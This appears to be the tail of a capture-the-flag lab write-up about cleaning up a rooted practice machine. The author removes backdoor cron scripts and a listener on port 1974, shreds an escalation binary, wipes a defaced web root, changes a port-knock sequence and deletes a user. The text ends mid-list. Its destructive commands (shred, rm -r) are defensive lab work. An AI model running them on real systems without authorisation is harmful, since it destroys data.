# Get and remove elevation binary

root@BM:~# /usr/local/share/sgml# shred -zu donpcgd

# Check for crons and remove crons

root@BM:~# crontab -e
*/1 * * * * /root/ssh/canyoussh.sh
*/10 * * * * /root/telnet.sh
*/1 * * * * /root/checkban/checkban.sh
root@BM:~# rm /etc/cron.hourly/pwn

# Find the backdoor

root@BM:~# netstat -tulpn | grep 1974

# Stop remove backdoor

root@BM:~# service sshd stop
root@BM:~# update-rc.d -f sshd remove
root@BM:~# rm /root/ssh/canyoussh.sh

# Stop ssh only if you have access via other means. I have reset the root password

root@BM:~# service ssh stop

# Remove Eric’s shells.

root@BM:~# rm /checkban/checkban.sh
root@BM:~# rm ebd.sh
root@BM:~# rm telnet.sh (funny telnet message for Billy)
root@BM:~# nano startup.sh
/root/telnet.sh &

# Back-up and remove defaced website, set root access read-only to be safe

root@BM:~# cp -r /var/www/html/ /var/www/html_old
root@BM:~# rm -r /var/www/html/*
root@BM:~# chmod 400 -R /var/www/html_old/
root@BM:~# ls -lah /var/www/
total 16K
drwxr-xr-x 4 root root 4.0K Sep 29 19:24 .
drwxr-xr-x 14 root root 4.0K Aug 11 20:58 ..
drw-r-xr-x 10 root root 4.0K Sep 29 19:18 html
dr-S--S--- 3 root root 4.0K Sep 29 19:20 html_old

# FTP knock should be changed

root@BM:~# nano /etc/knockd.conf
sequence = 43,1337,1776,1945,2001,2016

# Fuck Eric

root@BM:~# userdel eric

# Remove eric from sudoers

root@BM:~# nano /etc/sudoers
#includedir /etc/sudoers.d

# Remove Eric’s SMB share

root@BM:~# nano /etc/samba/smb.conf
path = /home/WeaselLaugh
guest ok = yes
read only = yes
writable = no
public = yes

# Reboot to see how it comes back up
After the reboot I check if I can only ‘physically’ access the machine and none of Eric’s ‘services’ are running.

Discovered open port 80/tcp on
Discovered open port 445/tcp on
Discovered open port 139/tcp on

Looks good from the outside.
Time to chill. Thanks Brian for the lulz!


I set out to brush up my skills a bit and this was labelled with a difficulty of Beginner/Moderate.
As someone who is in that between I felt it was a perfect fit indeed helped me progress in what I can do and how I can go about it.
I did feel a bit iffy about leaving leaving the wordpress honeypot on there as it did not know if it belonged to Billy or Eric so I disabled it but left it were it was
Folders of interest: